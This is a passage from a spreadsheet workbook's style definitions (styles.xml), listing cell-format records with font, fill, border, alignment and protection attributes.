    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="36" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="36" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="36" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="36" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>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38" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1"/>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176" fontId="1" fillId="0" borderId="1" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="1"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19" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="29" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5"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2" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="6" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="6" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="3" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="2" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="18" xfId="11" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="19" xfId="11" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="1" xfId="11" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="5" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="42" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="13" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="11" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="42" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="16" fillId="0" borderId="1" xfId="42" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="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1" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="34"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33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0"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center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="177" fontId="1" fillId="0" borderId="0" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="35" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="0" borderId="1" xfId="35" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="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1" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1"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protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="46"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left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="47" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="40"/>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="51"/>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="0" xfId="40" applyNumberFormat="1"/>
    <xf numFmtId="49" fontId="49" fillId="0" borderId="0" xfId="40" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="177" fontId="14" fillId="0" borderId="17" xfId="43" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="48" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="4" fillId="0" borderId="0"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shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="44" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="10" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="17" xfId="42" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="16" xfId="42" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="42" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="16" xfId="42" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="11" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="5" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="7" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="5" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="5" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="7" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="3" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="6" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="16" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="32" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="17" xfId="19" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="17" xfId="19" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="5" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="6" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="7" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="2" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="4" xfId="47" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="36" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="39" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="37" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="0" xfId="3" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="39" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
